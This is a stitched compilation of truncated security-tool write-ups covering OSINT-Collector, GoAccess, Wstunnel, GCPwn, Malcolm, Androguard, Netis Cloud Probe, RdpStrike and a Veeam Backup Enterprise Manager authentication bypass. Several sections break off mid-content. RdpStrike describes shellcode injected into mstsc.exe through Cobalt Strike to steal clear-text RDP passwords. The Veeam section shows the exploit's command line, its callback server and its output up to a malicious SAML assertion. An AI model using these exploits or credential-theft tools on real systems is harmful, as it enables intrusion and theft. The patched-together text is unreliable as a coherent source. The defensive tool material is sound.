OSINT-Collector : Harnessing Advanced Frameworks For Domain-Specific Intelligence Gathering

OSINT-Collector is an advanced framework that facilitates the collection, analysis, and management of OSINT information useful for conducting investigations in specific domains of interest.

Table Of Contents

  • Design and Architecture
  • Requirements
  • Sequence Diagram
    • Interaction Flow
  • Backend
    • Configuration
    • Importing OSINT Ontology
    • Creating Domain Ontology with Wikidata
    • Neo4j Plugins
  • Launcher
  • Frontend
    • Add Tools
  • Usage
    • Run Tools
    • View Results
    • Make Inferences
    • Search Engine
  • Preventing a School Shooting: a DEMO Scenario!

Design And Architecture

This framework uses an ontology-based approach:

  • The OSINT Ontology describes how data extracted from OSINT sources should be inserted into the database, including their respective properties and relationships.
  • Domain Ontologies describe various domains of interest. These ontologies are utilized to link the extracted data to entities within these domains, enabling deeper inferences.

Using the graphical interface, the user can select an OSINT tool, input required parameters, and initiate execution to perform a specific search.

This execution request is sent via an HTTP request to the Launcher, which then executes the requested tools using the corresponding inputs.

The resulting data are aggregated, filtered and sent via an HTTP request to the backend, which communicates with the database and performs the following operations:

  • Insertion and linking of data based on the schema described by the OSINT Ontology.
  • Analysis of textual documents using NLP techniques provided by cloud services to extract suspicious entities and moderate the text to identify dangerous categories.
  • Linking of entities and categories extracted in the previous phase with the domain ontologies.
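
As a minimal illustrative sketch (the node labels, properties, and relationship type below are hypothetical, not the framework's actual schema), inserting an extracted entity into Neo4j and linking it to a domain-ontology concept could look like this:

# Hypothetical example: store an extracted entity and link it to a domain-ontology concept.
# Labels and relationship names are illustrative only, not OSINT-Collector's real schema.
cypher-shell -u neo4j -p <password> "
  MERGE (e:Entity {name: 'example_handle', source: 'telegram'})
  MERGE (c:DomainConcept {label: 'Firearm'})
  MERGE (e)-[:LINKED_TO]->(c)"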

The user can view the search results through the graphical interface, where the framework highlights the content identified during analysis, emphasizing suspicious entities and categories.

Users can conduct further, more in-depth searches.

The OSINT Ontology also makes it easy to add new OSINT sources to leverage.

Requirements

This project requires the following dependencies to be installed:

  • Docker and Docker Compose
  • Node.js and npm


GoAccess : A Comprehensive Guide To Real-Time Web Log Analysis And Visualization

GoAccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal on *nix systems or through your browser.

It provides fast and valuable HTTP statistics for system administrators who require a visual server report on the fly.

Features

GoAccess parses the specified web log file and outputs the data to the X terminal. Features include:

  • Completely Real Time
    All panels and metrics are timed to be updated every 200 ms on the terminal output and every second on the HTML output.
  • Minimal Configuration needed
    You can just run it against your access log file, pick the log format and let GoAccess parse the access log and show you the stats.
  • Track Application Response Time
    Track the time taken to serve the request. Extremely useful if you want to track pages that are slowing down your site.
  • Nearly All Web Log Formats
GoAccess allows any custom log format string. Predefined options include Apache, Nginx, Amazon S3, Elastic Load Balancing, CloudFront, and more.
  • Incremental Log Processing
    Need data persistence? GoAccess has the ability to process logs incrementally through the on-disk persistence options.
  • Only one dependency
    GoAccess is written in C. To run it, you only need ncurses as a dependency. That’s it. It even features its own Web Socket server.
  • Visitors
Determine the number of hits, visitors, bandwidth, and metrics for the slowest-running requests by the hour or date.
  • Metrics per Virtual Host
    Have multiple Virtual Hosts (Server Blocks)? It features a panel that displays which virtual host is consuming most of the web server resources.
  • ASN (Autonomous System Number mapping)
Great for detecting malicious traffic patterns and blocking them accordingly.
  • Color Scheme Customizable
    Tailor GoAccess to suit your own color taste/schemes. Either through the terminal, or by simply applying the stylesheet on the HTML output.
  • Support for Large Datasets
    GoAccess features the ability to parse large logs due to its optimized in-memory hash tables. It has very good memory usage and pretty good performance. This storage has support for on-disk persistence as well.
  • Docker Support
Ability to build GoAccess’ Docker image from upstream. You can still fully configure it by using volume mapping and editing goaccess.conf. See the Docker section below.

Nearly All Web Log Formats…

GoAccess allows any custom log format string. Predefined options include, but are not limited to:

  • Amazon CloudFront (Download Distribution)
  • Amazon Simple Storage Service (S3)
  • AWS Elastic Load Balancing
  • Combined Log Format (XLF/ELF) Apache | Nginx
  • Common Log Format (CLF) Apache
  • Google Cloud Storage
  • Apache virtual hosts
  • Squid Native Format
  • W3C format (IIS)
  • Caddy’s JSON Structured format
  • Traefik’s CLF flavor

Why GoAccess?

GoAccess was designed to be a fast, terminal-based log analyzer. Its core idea is to quickly analyze and view web server statistics in real time without needing to use your browser (great if you want to do a quick analysis of your access log via SSH, or if you simply love working in the terminal).

While the terminal output is the default output, it has the capability to generate a complete, self-contained, real-time HTML report, as well as a JSON, and CSV report.
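
For instance, a few typical invocations (the flags are as documented by GoAccess; the log file name and format are placeholders for your own setup):

# interactive terminal report; GoAccess prompts for the log format if it is not set
goaccess access.log

# self-contained HTML report, updated in real time via GoAccess's own WebSocket server
goaccess access.log --log-format=COMBINED -o report.html --real-time-html

# incremental processing: persist parsed data to disk, then restore it on a later run
goaccess access.log --log-format=COMBINED --persist --db-path=/tmp/goaccess
goaccess access.log --log-format=COMBINED --restore --db-path=/tmp/goaccess -o report.html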

You can think of it as more of a monitoring command tool than anything else.


Wstunnel – Revolutionizing Network Access Through Advanced Tunneling Techniques

Most of the time when you are using a public network, you are behind some kind of firewall or proxy. One of their purposes is to constrain you to use only certain kinds of protocols and to consult only a subset of the web.

Nowadays, the most widespread protocol is HTTP, and it is de facto allowed by most third-party equipment.

Wstunnel uses the WebSocket protocol, which is compatible with HTTP, to bypass firewalls and proxies. It allows you to tunnel whatever traffic you want and access whatever resources or sites you need.
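
For example, a minimal setup (host names and ports are placeholders) runs the server on a remote machine and exposes a local SOCKS5 proxy tunneled through it:

# on the remote machine: accept tunnel clients over websocket
wstunnel server wss://[::]:8080

# on the local machine: dynamic SOCKS5 proxy forwarded through the tunnel
wstunnel client -L socks5://127.0.0.1:8888 wss://myRemoteHost:8080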

My inspiration came from this project, but as I didn't want to install npm and Node.js to use the tool, I originally remade it in Haskell and have since rewritten and improved it in Rust.

What To Expect:

  • Easy to use
  • Good error messages and debug information
  • Static forward and reverse tunneling (TCP, UDP, Unix socket, Stdio)
  • Dynamic tunneling (TCP, UDP Socks5 proxy and Transparent Proxy)
  • Support for http proxy (when behind one)
  • Support of proxy protocol
  • Support for tls/https server with certificates auto-reload (with embedded self-signed certificate, or your own)
  • Support of mTLS with certificates auto-reload – documentation here
  • Support IPv6
  • Support for Websocket and HTTP2 as transport protocol (websocket is more performant)
  • Standalone binaries (so just cp it where you want) here

Note

v7.0.0 is a complete rewrite of wstunnel in Rust and is not compatible with previous versions. The previous Haskell code can be found on its own branch.

What to expect compared to the previous version:

  • More throughput and less jitter, since there are no more Haskell GC pauses. Most of you will not care, as it was performant enough already, but you can now saturate a gigabit Ethernet card with a single connection
  • The command line is more homogeneous/has better UX. All tunnels can be specified multiple times
  • The tunnel protocol tries to look like normal traffic, to avoid being flagged
  • Support of reverse tunneling
  • New bugs, as it is a rewrite (╯'□')╯︵ ┻━┻ ¯\_(ツ)_/¯
  • Mainly for me, to ease the maintenance of the project. I don't do a lot of Haskell nowadays, and it was getting harder to keep maintaining the project as I lost touch with the Haskell ecosystem and its new releases
  • Armv7 builds (aka Raspberry Pi), as newer versions of GHC (the Haskell compiler) dropped support for it

Command Line

Usage: wstunnel client [OPTIONS] <ws[s]|http[s]://wstunnel.server.com[:port]>

Arguments:
  <ws[s]|http[s]://wstunnel.server.com[:port]>
          Address of the wstunnel server
          You can either use websocket or http2 as transport protocol. Use websocket if you are unsure.
          Example: For websocket with TLS wss://wstunnel.example.com or without ws://wstunnel.example.com
                   For http2 with TLS https://wstunnel.example.com or without http://wstunnel.example.com
          
          *WARNING* HTTP2 as transport protocol is harder to make it works because:
            - If you are behind a (reverse) proxy/CDN they are going to buffer the whole request before forwarding it to the server
              Obviously, this is not going to work for tunneling traffic
            - if you have wstunnel behind a reverse proxy, most of them (i.e: nginx) are going to turn http2 request into http1
              This is not going to work, because http1 does not support streaming naturally
          The only way to make it works with http2 is to have wstunnel directly exposed to the internet without any reverse proxy in front of it

Options:
  -L, --local-to-remote <{tcp,udp,socks5,stdio,unix}://[BIND:]PORT:HOST:PORT>
          Listen on local and forwards traffic from remote. Can be specified multiple times
          examples:
          'tcp://1212:google.com:443'      =>       listen locally on tcp on port 1212 and forward to google.com on port 443
          'tcp://2:n.lan:4?proxy_protocol' =>       listen locally on tcp on port 2 and forward to n.lan on port 4
                                                    Send a proxy protocol header v2 when establishing connection to n.lan
          
          'udp://1212:1.1.1.1:53'          =>       listen locally on udp on port 1212 and forward to cloudflare dns 1.1.1.1 on port 53
          'udp://1212:1.1.1.1:53?timeout_sec=10'    timeout_sec on udp force close the tunnel after 10sec. Set it to 0 to disable the timeout [default: 30]
          
          'socks5://[::1]:1212'            =>       listen locally with socks5 on port 1212 and forward dynamically requested tunnel
          
          'tproxy+tcp://[::1]:1212'        =>       listen locally on tcp on port 1212 as a *transparent proxy* and forward dynamically requested tunnel
          'tproxy+udp://[::1]:1212?timeout_sec=10'  listen locally on udp on port 1212 as a *transparent proxy* and forward dynamically requested tunnel
                                                    linux only and requires sudo/CAP_NET_ADMIN
          
          'stdio://google.com:443'         =>       listen for data from stdio, mainly for `ssh -o ProxyCommand="wstunnel client --log-lvl=off -L stdio://%h:%p ws://localhost:8080" my-server`
          
          'unix:///tmp/wstunnel.sock:g.com:443' =>  listen for data from unix socket of path /tmp/wstunnel.sock and forward to g.com:443

  -R, --remote-to-local <{tcp,udp,socks5,unix}://[BIND:]PORT:HOST:PORT>
          Listen on remote and forwards traffic from local. Can be specified multiple times. Only tcp is supported
          examples:
          'tcp://1212:google.com:443'      =>     listen on server for incoming tcp cnx on port 1212 and forward to google.com on port 443 from local machine
          'udp://1212:1.1.1.1:53'          =>     listen on server for incoming udp on port 1212 and forward to cloudflare dns 1.1.1.1 on port 53 from local machine
          'socks5://[::1]:1212'            =>     listen on server for incoming socks5 request on port 1212 and forward dynamically request from local machine
          'unix://wstunnel.sock:g.com:443' =>     listen on server for incoming data from unix socket of path wstunnel.sock and forward to g.com:443 from local machine

      --no-color <NO_COLOR>
          Disable color output in logs
          
          [env: NO_COLOR=]

      --socket-so-mark <INT>
          (linux only) Mark network packet with SO_MARK sockoption with the specified value.
          You need to use {root, sudo, capabilities} to run wstunnel when using this option

  -c, --connection-min-idle <INT>
          Client will maintain a pool of open connection to the server, in order to speed up the connection process.
          This option set the maximum number of connection that will be kept open.
          This is useful if you plan to create/destroy a lot of tunnel (i.e: with socks5 to navigate with a browser)
          It will avoid the latency of doing tcp + tls handshake with the server
          
          [default: 0]

      --nb-worker-threads <INT>
          *WARNING* The flag does nothing, you need to set the env variable *WARNING*
          Control the number of threads that will be used.
          By default, it is equal the number of cpus
          
          [env: TOKIO_WORKER_THREADS=]

      --log-lvl <LOG_LEVEL>
          Control the log verbosity. i.e: TRACE, DEBUG, INFO, WARN, ERROR, OFF
          for more details: https://docs.rs/tracing-subscriber/latest/tracing_subscriber/filter/struct.EnvFilter.html#example-syntax
          
          [env: RUST_LOG=]
          [default: INFO]

      --tls-sni-override <DOMAIN_NAME>
          Domain name that will be used as SNI during TLS handshake
          Warning: If you are behind a CDN (i.e: Cloudflare) you must set this domain also in the http HOST header.
                   or it will be flagged as fishy and your request rejected

      --tls-sni-disable
          Disable sending SNI during TLS handshake
          Warning: Most reverse proxies rely on it

      --tls-verify-certificate
          Enable TLS certificate verification.
          Disabled by default. The client will happily connect to any server with self-signed certificate.

  -p, --http-proxy <USER:PASS@HOST:PORT>
          If set, will use this http proxy to connect to the server
          
          [env: HTTP_PROXY=]

      --http-proxy-login <LOGIN>
          If set, will use this login to connect to the http proxy. Override the one from --http-proxy
          
          [env: WSTUNNEL_HTTP_PROXY_LOGIN=]

      --http-proxy-password <PASSWORD>
          If set, will use this password to connect to the http proxy. Override the one from --http-proxy
          
          [env: WSTUNNEL_HTTP_PROXY_PASSWORD=]

  -P, --http-upgrade-path-prefix <HTTP_UPGRADE_PATH_PREFIX>
          Use a specific prefix that will show up in the http path during the upgrade request.
          Useful if you need to route requests server side but don't have vhosts
          
          [env: WSTUNNEL_HTTP_UPGRADE_PATH_PREFIX=]
          [default: v1]

      --http-upgrade-credentials <USER[:PASS]>
          Pass authorization header with basic auth credentials during the upgrade request.
          If you need more customization, you can use the http_headers option.

      --websocket-ping-frequency-sec <seconds>
          Frequency at which the client will send websocket ping to the server.
          
          [default: 30]

      --websocket-mask-frame
          Enable the masking of websocket frames. Default is false
          Enable this option only if you use unsecure (non TLS) websocket server, and you see some issues. Otherwise, it is just overhead.

  -H, --http-headers <HEADER_NAME: HEADER_VALUE>
          Send custom headers in the upgrade request
          Can be specified multiple time

      --http-headers-file <FILE_PATH>
          Send custom headers in the upgrade request reading them from a file.
          It overrides http_headers specified from command line.
          File is read everytime and file format must contain lines with `HEADER_NAME: HEADER_VALUE`

      --tls-certificate <FILE_PATH>
          [Optional] Certificate (pem) to present to the server when connecting over TLS (HTTPS).
          Used when the server requires clients to authenticate themselves with a certificate (i.e. mTLS).
          The certificate will be automatically reloaded if it changes

      --tls-private-key <FILE_PATH>
          [Optional] The private key for the corresponding certificate used with mTLS.
          The certificate will be automatically reloaded if it changes



SERVER
Usage: wstunnel server [OPTIONS] <ws[s]://0.0.0.0[:port]>

Arguments:
  <ws[s]://0.0.0.0[:port]>
          Address of the wstunnel server to bind to
          Example: With TLS wss://0.0.0.0:8080 or without ws://[::]:8080
          
          The server is capable of detecting by itself if the request is websocket or http2. So you don't need to specify it.

Options:
      --socket-so-mark <INT>
          (linux only) Mark network packet with SO_MARK sockoption with the specified value.
          You need to use {root, sudo, capabilities} to run wstunnel when using this option

      --websocket-ping-frequency-sec <seconds>
          Frequency at which the server will send websocket ping to client.

      --no-color <NO_COLOR>
          Disable color output in logs
          
          [env: NO_COLOR=]

      --websocket-mask-frame
          Enable the masking of websocket frames. Default is false
          Enable this option only if you use unsecure (non TLS) websocket server, and you see some issues. Otherwise, it is just overhead.

      --nb-worker-threads <INT>
          *WARNING* The flag does nothing, you need to set the env variable *WARNING*
          Control the number of threads that will be used.
          By default, it is equal the number of cpus
          
          [env: TOKIO_WORKER_THREADS=]

      --restrict-to <DEST:PORT>
          Server will only accept connection from the specified tunnel information.
          Can be specified multiple time
          Example: --restrict-to "google.com:443" --restrict-to "localhost:22"

      --dns-resolver <DNS_RESOLVER>
          Dns resolver to use to lookup ips of domain name
          This option is not going to work if you use transparent proxy
          Can be specified multiple time
          Example:
           dns://1.1.1.1 for using udp
           dns+https://1.1.1.1 for using dns over HTTPS
           dns+tls://8.8.8.8 for using dns over TLS
          To use libc resolver, use
          system://0.0.0.0

      --log-lvl <LOG_LEVEL>
          Control the log verbosity. i.e: TRACE, DEBUG, INFO, WARN, ERROR, OFF
          for more details: https://docs.rs/tracing-subscriber/latest/tracing_subscriber/filter/struct.EnvFilter.html#example-syntax
          
          [env: RUST_LOG=]
          [default: INFO]

  -r, --restrict-http-upgrade-path-prefix <RESTRICT_HTTP_UPGRADE_PATH_PREFIX>
          Server will only accept connection from if this specific path prefix is used during websocket upgrade.
          Useful if you specify in the client a custom path prefix, and you want the server to only allow this one.
          The path prefix act as a secret to authenticate clients
          Disabled by default. Accept all path prefix. Can be specified multiple time
          
          [env: WSTUNNEL_RESTRICT_HTTP_UPGRADE_PATH_PREFIX=]

      --restrict-config <RESTRICT_CONFIG>
          Path to the location of the restriction yaml config file.
          Restriction file is automatically reloaded if it changes

      --tls-certificate <FILE_PATH>
          [Optional] Use custom certificate (pem) instead of the default embedded self-signed certificate.
          The certificate will be automatically reloaded if it changes

      --tls-private-key <FILE_PATH>
          [Optional] Use a custom tls key (pem, ec, rsa) that the server will use instead of the default embedded one
          The private key will be automatically reloaded if it changes

      --tls-client-ca-certs <FILE_PATH>
          [Optional] Enables mTLS (client authentication with certificate). Argument must be PEM file
          containing one or more certificates of CA's of which the certificate of clients needs to be signed with.
          The ca will be automatically reloaded if it changes


GCPwn – A Comprehensive Tool For GCP Security Testing

gcpwn is a tool I built while learning GCP; it leverages the newer gRPC client libraries created by Google.

It consists of numerous enumeration modules I wrote, plus exploit modules leveraging research done by others in the space (e.g., Rhino Security), along with some existing standalone tools like GCPBucketBrute, in an effort to make the tool a one-stop shop for GCP testing.

While other exploit scripts are generally single-use, GCPwn stores both data and permissions as you run through modules, organizing the data for you and reusing it to make your life easier when pentesting and tracking permissions.

Who Is This For?

This tool is mainly for pentesters, those just learning GCP security, and security researchers in general.

  • For pentesters, as illustrated above, the tool automates a lot of scripts you would normally run and stores data to make exploit modules trivial to execute.
  • For those just learning GCP security, the tool is set up in such a way that it should be easy to add your own module via a pull request as you dive into an individual service.
  • For security researchers, the tool allows you to run through a large number of GCP API calls, and I document how to proxy the tool in the background through a local tool like Burp Suite (see the sketch after this list).
    • So running enum_all with Burp Suite logging all the requests will give you visibility into all the different API endpoints across all the different Python libraries with one command.
      • That's the hope at least; I got it partially working with env variables, if someone can finish cracking the code 🙂
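
A rough sketch of that env-variable approach (these are generic Python proxy variables rather than gcpwn-specific flags, and they assume the underlying HTTP stacks honor them; the gRPC channels are exactly the part that only partially works):

# route Python HTTP(S) traffic through a local Burp Suite listener
export HTTP_PROXY=http://127.0.0.1:8080
export HTTPS_PROXY=http://127.0.0.1:8080
# trust Burp's CA certificate (export it from Burp as a PEM file first)
export REQUESTS_CA_BUNDLE=/path/to/burp-ca.pem
export SSL_CERT_FILE=/path/to/burp-ca.pem
python3 main.py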

Installation Support

I tested GCPwn with the following installation setups. While it's Python, which should theoretically work everywhere, I can't GUARANTEE there are no bugs on Windows, etc., although I'm happy to fix any that arise:

Supported OS: Kali Linux 6.6.9

Python Version: Python3 3.11.8

Installation

Ideally the tool will be on pip at some point. For now, it requires a git clone and a setup script. Once you start the tool, it will ask you to create a workspace (a purely logical attempt at a container; you can pass in whatever name you want) and you should be good to go. setup.sh just installs the gcloud CLI and pip-installs requirements.txt, if you wanted to do those separately.

# Setup a virtual environment
python3 -m venv ./myenv
source myenv/bin/activate

# Clone the tool locally
git clone https://github.com/NetSPI/gcpwn.git

# Run setup.sh; This will install gcloud CLI tool and pip3 install -r requirements if you want to do those separately
chmod +x setup.sh; ./setup.sh

# Launch the tool after all items installed & create first workspace
python3 main.py
[*] No workspaces were detected.
New workspace name: my_workspace
[*] Workspace 'my_workspace' created.

Welcome to your workspace! Type 'help' or '?' to see available commands.

[*] Listing existing credentials...

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default 
Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, 
or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit 
an empty string. 
 [1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo]) 
 [2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json)
 [3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)  
 [4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json)

*To get scope and/or email info for Oauth2 tokens (options 1-3) include a third argument of 
"tokeninfo" to send the tokens to Google's official oauth2 endpoint to get back scope. 
tokeninfo will set the credential name for oauth2, otherwise credential name will be used.
Advised for best results. See https://cloud.google.com/docs/authentication/token-types#access-contents.
Using tokeninfo will add scope/email to your references if not auto-picked up.

Input:  


Quick Start – Comprehensive Guide To Installing And Configuring Malcolm On Linux Platforms

The files required to build and run Malcolm are available on its GitHub page. Malcolm's source code is released under the terms of the Apache License, Version 2.0 (see LICENSE.txt and NOTICE.txt for the terms of its release).

Building Malcolm From Scratch

The build.sh script can build Malcolm’s Docker images from scratch. See Building from source for more information.

Initial Configuration

The scripts to control Malcolm require Python 3. The install.py script requires the dotenv, requests and PyYAML modules for Python 3, and will make use of the pythondialog module for user interaction (on Linux) if it is available.

You must run auth_setup prior to pulling Malcolm’s Docker images. You should also ensure your system configuration and Malcolm settings are tuned by running ./scripts/install.py and ./scripts/configure (see Malcolm Configuration).
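
In practice, that initial sequence looks like this (paths are relative to the Malcolm checkout; script names are as referenced above):

# create authentication credentials before pulling images
./scripts/auth_setup

# tune system configuration and Malcolm settings
./scripts/install.py
./scripts/configure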

Pull Malcolm’s Docker Images

Malcolm’s Docker images are periodically built and hosted on GitHub. If you already have Docker and Docker Compose, these prebuilt images can be pulled by navigating into the Malcolm directory (containing the docker-compose.yml file) and running docker compose --profile malcolm pull like this:

$ docker compose --profile malcolm pull
Pulling api               ... done
Pulling arkime            ... done
Pulling dashboards        ... done
Pulling dashboards-helper ... done
Pulling file-monitor      ... done
Pulling filebeat          ... done
Pulling freq              ... done
Pulling htadmin           ... done
Pulling logstash          ... done
Pulling netbox            ... done
Pulling netbox-postgresql ... done
Pulling netbox-redis      ... done
Pulling nginx-proxy       ... done
Pulling opensearch        ... done
Pulling pcap-capture      ... done
Pulling pcap-monitor      ... done
Pulling suricata          ... done
Pulling upload            ... done
Pulling zeek              ... done

You can then observe the images have been retrieved by running docker images:

$ docker images
REPOSITORY                                                     TAG               IMAGE ID       CREATED      SIZE
ghcr.io/idaholab/malcolm/api                                   24.05.0           xxxxxxxxxxxx   3 days ago   158MB
ghcr.io/idaholab/malcolm/arkime                                24.05.0           xxxxxxxxxxxx   3 days ago   816MB
ghcr.io/idaholab/malcolm/dashboards                            24.05.0           xxxxxxxxxxxx   3 days ago   1.02GB
ghcr.io/idaholab/malcolm/dashboards-helper                     24.05.0           xxxxxxxxxxxx   3 days ago   184MB
ghcr.io/idaholab/malcolm/file-monitor                          24.05.0           xxxxxxxxxxxx   3 days ago   588MB
ghcr.io/idaholab/malcolm/file-upload                           24.05.0           xxxxxxxxxxxx   3 days ago   259MB
ghcr.io/idaholab/malcolm/filebeat-oss                          24.05.0           xxxxxxxxxxxx   3 days ago   624MB
ghcr.io/idaholab/malcolm/freq                                  24.05.0           xxxxxxxxxxxx   3 days ago   132MB
ghcr.io/idaholab/malcolm/htadmin                               24.05.0           xxxxxxxxxxxx   3 days ago   242MB
ghcr.io/idaholab/malcolm/logstash-oss                          24.05.0           xxxxxxxxxxxx   3 days ago   1.35GB
ghcr.io/idaholab/malcolm/netbox                                24.05.0           xxxxxxxxxxxx   3 days ago   1.01GB
ghcr.io/idaholab/malcolm/nginx-proxy                           24.05.0           xxxxxxxxxxxx   3 days ago   121MB
ghcr.io/idaholab/malcolm/opensearch                            24.05.0           xxxxxxxxxxxx   3 days ago   1.17GB
ghcr.io/idaholab/malcolm/pcap-capture                          24.05.0           xxxxxxxxxxxx   3 days ago   121MB
ghcr.io/idaholab/malcolm/pcap-monitor                          24.05.0           xxxxxxxxxxxx   3 days ago   213MB
ghcr.io/idaholab/malcolm/postgresql                            24.05.0           xxxxxxxxxxxx   3 days ago   268MB
ghcr.io/idaholab/malcolm/redis                                 24.05.0           xxxxxxxxxxxx   3 days ago   34.2MB
ghcr.io/idaholab/malcolm/suricata                              24.05.0           xxxxxxxxxxxx   3 days ago   278MB
ghcr.io/idaholab/malcolm/zeek                                  24.05.0           xxxxxxxxxxxx   3 days ago   1GB


Installation – Comprehensive Guide To Using Androguard

Androguard is a powerful and versatile tool for reverse engineering Android applications.

This guide provides a step-by-step overview of how to install Androguard using different methods, including direct downloads from PyPI and builds from the latest commits on GitHub.

Once installed, explore its comprehensive command-line interface that offers a range of functionalities from APK analysis to dynamic tracing.

Whether you’re a developer or a security analyst, Androguard equips you with the essential tools to dive deep into Android app structures and behaviors.

You can install Androguard in three different ways:

Getting One Of The Released Versions From PyPI

pip install Androguard

or if you want an older version

pip install androguard==3.3.5

Getting A Version With All The Latest Commits

git clone https://github.com/androguard/androguard.git
cd androguard
pip install .

or the same thing using pip and the GitHub URL of the project:

pip install git+https://github.com/androguard/androguard

Androguard Is Now Available To Be Used As A CLI And As A Library

Sessions

All events are saved in the file ‘androguard.db’, which is basically a SQLite database. There are 3 tables:

  • information (related to all APK/DEX/… analyzed during a session)
  • session (unique key to identify a particular session done)
  • pentest (saved Frida events)

Please note that the sessions are work in progress!
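
For example, you can inspect a session database directly with the sqlite3 CLI (the table names are those listed above):

# list the tables in the session database
sqlite3 androguard.db '.tables'

# dump the recorded sessions
sqlite3 androguard.db 'SELECT * FROM session;'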

CLI

The CLI serves as the primary and easiest way for interacting with Androguard.

Upon installing Androguard with any of the methods shown above, the tool should be available in your path as androguard.

Usage: androguard [OPTIONS] COMMAND [ARGS]...

  Androguard is a full Python tool to reverse Android Applications.

Options:
  --version           Show the version and exit.
  --verbose, --debug  Print more
  --help              Show this message and exit.

Commands:
  analyze      Open a IPython Shell and start reverse engineering.
  apkid        Return the packageName/versionCode/versionName per APK as...
  arsc         Decode resources.arsc either directly from a given file or...
  axml         Parse the AndroidManifest.xml.
  cg           Create a call graph based on the data of Analysis and...
  decompile    Decompile an APK and create Control Flow Graphs.
  disassemble  Disassemble Dalvik Code with size SIZE starting from an...
  dtrace       Start dynamically an installed APK on the phone and start...
  dump         Start and dump dynamically an installed APK on the phone
  sign         Return the fingerprint(s) of all certificates inside an APK.
  trace        Push an APK on the phone and start to trace all...
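
For instance, to print the package identifiers of an APK or parse its manifest (the APK file name is a placeholder):

androguard apkid my_app.apk
androguard axml my_app.apk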


Netis Cloud Probe – Bridging Network Monitoring Gaps With Advanced Packet Capture Tools

Netis Cloud Probe (formerly named Packet Agent) is an open-source project built for the following situation: it captures packets on machine A but has to use them on machine B.

This case is very common when you try to monitor network traffic in the LAN but the infrastructure cannot support it, for example:

  • There is neither TAP nor SPAN device in a physical environment.
  • The Virtual Switch Flow Table does not support SPAN function in a virtualization environment.

This project also aims to develop a suite of low-cost but high-efficiency tools to overcome the challenges above.

  • pktminerg is the very first one; it lets you easily capture packets from a NIC interface, encapsulate them with GRE, and send them to a remote machine for monitoring and analysis.
  • pcapcompare is a utility for comparing two different pcap files.
  • gredump is used for capturing GRE packets with a filter and saving them to a pcap file.
  • gredemo is a demo app that reads packets from a pcap file and sends them all to a remote NIC. It can only be used when built from source code.
  • probeDaemon is a module newly added in v0.7.0 that is responsible for managing the pktminerg process.
    • It can start and kill the pktminerg process and set pktminerg's command-line parameters. This module works with CPM (Cloud Probe Manager), which provides a user interface for setting pktminerg strategies and can also display the statistics reported by pktminerg in graphs.
      • You can contact Netis for further support of CPM, or you can develop your own CPM. Currently there is no probeDaemon for Windows; it will be released later.

Getting Started

Installation

CentOS 7/8 and RedHat 7

  1. Download and install the RPM package. Find the latest package from Releases Page.
wget https://github.com/Netis/cloud-probe/releases/download/v0.7.0/netis-cloud-probe-0.7.0.x86_64_centos.rpm
rpm -ivh netis-cloud-probe-0.7.0.x86_64_centos.rpm
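
Once installed, a typical capture looks like this (the interface name and remote IP are placeholders; this mirrors the project's quick-start example, with pktminerg encapsulating captured packets in GRE and streaming them to the remote host):

# capture packets on eth0 and send them, GRE-encapsulated, to 172.16.1.201
pktminerg -i eth0 -r 172.16.1.201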


RdpStrike – Harnessing PIC And Hardware Breakpoints For Credential Extraction

RdpStrike is basically a mini project I built to dive deep into Position Independent Code (PIC), referring to a blog post written by C5pider, chained with the RdpThief tool created by 0x09AL. The project aims to extract clear-text passwords from mstsc.exe, and the shellcode uses hardware breakpoints to hook APIs. It is completely position-independent code; when the shellcode is injected into the mstsc.exe process, it places hardware breakpoints on three different APIs (SspiPrepareForCredRead, CryptProtectMemory, and CredIsMarshaledCredentialW), ultimately capturing any clear-text credentials and then saving them to a file.

An Aggressor script monitors for new processes; if an mstsc.exe process is spawned, it injects the shellcode into it.

When the Aggressor script is loaded in Cobalt Strike, three new commands become available:

rdpstrike_enable – Enables the heartbeat check of new mstsc.exe processes and injects into them.
rdpstrike_disable – Disables the heartbeat check of new mstsc.exe but is not going to remove the hooks and free the shellcode.
rdpstrike_dump – Reads the file and prints the extracted credentials if any.

IOCs

  • It uses the Cobalt Strike built-in shellcode injector, which is easily detected by the kernel callback function PsSetCreateThreadNotifyRoutine/PsSetCreateThreadNotifyRoutineEx.
  • The hooks are placed using GetThreadContext & SetThreadContext; the calls are executed from unbacked memory.
  • The shellcode writes a file in TEMP (C:\Windows\Temp) with the name {7C6A0555-C7A9-4E26-9744-5C2526EA3039}.dat
  • There is also a call to LoadLibraryA loading dpapi.dll, which again comes from unbacked memory.
  • The NtQuerySystemInformation syscall is used to get a list of threads in the process.

CVE-2024-29849 : The Veeam Backup Enterprise Manager Authentication Bypass

According to the official Veeam advisory, all versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 are vulnerable.

Usage

First, you need the right setup for local HTTPS; use the following commands:

openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
python CVE-2024-29849.py --target https://192.168.253.180:9398/ --callback-server 192.168.253.1:443

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/


(*) Target https://192.168.253.180:9398 is reachable and seems to be a Veeam Backup Enterprise Manager
(*) Fetching certificate for 192.168.253.180
(*) Common Name (CN) extracted from certificate: batserver.evilcorp.local
(*) Assumed domain name: evilcorp.local
(?) Is the assumed domain name correct(Y/n)?y
(*) Target domain name is: evilcorp.local
(*) Starting callback server

(^_^) Prepare for the Pwnage (^_^)

(*) Callback server listening on https://192.168.253.1:443
192.168.253.1 - - [10/Jun/2024 07:20:13] "GET / HTTP/1.1" 200 -
(*) Callback server 192.168.253.1:443 is reachable
(*) Triggering malicious SAML assertion to https://192.168.253.180:9398
